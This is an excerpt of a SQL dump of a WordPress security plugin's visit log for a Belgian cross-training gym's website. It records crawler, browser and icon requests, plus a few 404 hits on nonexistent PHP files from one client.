(68694, 1491146043.928445, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68695, 1491147484.491608, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68696, 1491148538.418291, 1054099761, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36'),
(68697, 1491148666.210576, 2366148132, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70865, 1493266762.534623, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70866, 1493266767.063512, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70867, 1493266771.620880, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70868, 1493284892.863510, 1837156116, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70869, 1493289504.654082, 3429212575, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(70870, 1493290325.750006, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0ahUKEwiWqPT3u8TTAhVBVhoKHbm6AGwQ_BcIiwEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(70871, 1493290328.753156, 3267064321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(70872, 1493292343.791888, 2995859706, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70873, 1493292346.564231, 2995859706, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70874, 1493292347.096978, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70875, 1493292347.589311, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70876, 1493292348.065497, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70877, 1493292348.575474, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70878, 1493292349.176127, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70879, 1493292349.701595, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70880, 1493292350.182535, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70881, 1493292350.661427, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70882, 1493292351.143954, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70883, 1493305187.891114, 676177811, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70884, 1493305194.301743, 2637637595, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70885, 1493305227.273182, 1837953980, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(68603, 1490954885.118067, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68602, 1490953427.681444, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(68600, 1490953164.887139, 878139038, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(68601, 1490953427.272224, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(68599, 1490952241.470800, 1355396144, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68598, 1490952178.060429, 1355396144, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68698, 1491151703.616328, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68699, 1491153500.154821, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68700, 1491153661.528389, 90561644, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)'),
(68701, 1491156539.845907, 885654392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),
(68702, 1491156540.449944, 885654392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),
(68703, 1491157968.328121, 1538450291, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E277 [FBAN/FBIOS;FBAV/86.0.0.48.52;FBBV/53842252;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/53842252]'),
(68704, 1491159639.695636, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68705, 1491160922.910980, 3475901914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68706, 1491169739.749549, 872548958, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ltx71 - (http://ltx71.com/)'),
(68707, 1491172048.394788, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68708, 1491178932.750793, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68709, 1491180240.963831, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68710, 1491188883.307421, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68711, 1491198602.085688, 1539836988, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(68712, 1491198602.958222, 1539836988, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68713, 1491203182.552309, 2745975302, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(68714, 1491203215.756395, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(68715, 1491208166.999873, 2999198281, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.fr/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68716, 1491209599.260743, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68717, 1491211566.273974, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjelvH5-4fTAhXKOxoKHUA0D2IQFgggMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68718, 1491211570.211720, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68719, 1491211570.593940, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68720, 1491212401.836935, 3475901740, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68721, 1491225128.360247, 3024883594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68722, 1491226231.151610, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68723, 1491226231.625604, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68724, 1491229774.530355, 1753457444, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68725, 1491229779.865468, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68726, 1491229782.520809, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68727, 1491229784.265221, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68728, 1491229789.704673, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68729, 1491229799.315674, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68730, 1491229804.922982, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68731, 1491229809.022600, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68732, 1491229813.762172, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68733, 1491232615.685063, 1757808628, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)'),
(68734, 1491233442.105254, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68735, 1491233444.800123, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68736, 1491233444.801959, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10602.4.8.0.1 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(68737, 1491233445.324997, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10602.4.8.0.1 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(68738, 1491233445.837051, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68739, 1491237010.744715, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/pomo.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68740, 1491239474.809837, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68741, 1491241034.853744, 3475901930, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68742, 1491241289.477829, 1402770394, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.fr/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68743, 1491243061.595915, 1897166120, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(68744, 1491245178.257330, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68745, 1491245185.534090, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68746, 1491245186.255223, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68747, 1491245186.766859, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68748, 1491245187.228037, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68749, 1491245187.657202, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68750, 1491245188.156497, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68751, 1491245188.716745, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68752, 1491245189.275507, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68753, 1491245189.816145, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68754, 1491245190.512048, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68755, 1491245190.995133, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68756, 1491253265.032171, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68757, 1491253266.065958, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68758, 1491253266.535402, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68759, 1491255138.498595, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/locoy.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68760, 1491258549.417015, 96241765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0'),
(68761, 1491259174.409155, 3110360645, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstoneconstruction.com/', 'Mozilla/4.0 (compatible  MSIE 8.0  Windows NT 5.1  Trident/4.0  WebMoney Advisor  .NET CLR 1.1.4322  InfoPath.2  .NET CLR 2.0.50727  .NET CLR 3.0.04506.30  .NET CLR 3.0.4506.2152  .NET CLR 3.5.30729  .NET4.0C  .NET4.0E  MS-RTC LM 8  BO2IE8_v1 ENUS)'),
(68762, 1491263170.728798, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(68763, 1491264028.758869, 3475901939, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68764, 1491264794.789578, 3475901939, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68765, 1491273399.034249, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/yt.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68766, 1491273408.189500, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68767, 1491275675.905595, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68768, 1491279326.852284, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68769, 1491290925.449664, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68770, 1491291650.321282, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/search.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68771, 1491292403.605067, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68772, 1491292404.256997, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(68773, 1491292404.839876, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68774, 1491292405.338983, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68775, 1491292405.820609, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68776, 1491292406.361932, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68777, 1491292406.915686, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68778, 1491292407.384038, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68779, 1491292407.917173, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68780, 1491292408.396400, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68781, 1491292409.091704, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68782, 1491297864.572118, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68783, 1491299949.580407, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjF8_SaxYrTAhXFzRQKHQHMAH0QFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=cx-iKwUTkUhJilhSHuSm5Q', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68784, 1491299954.132903, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
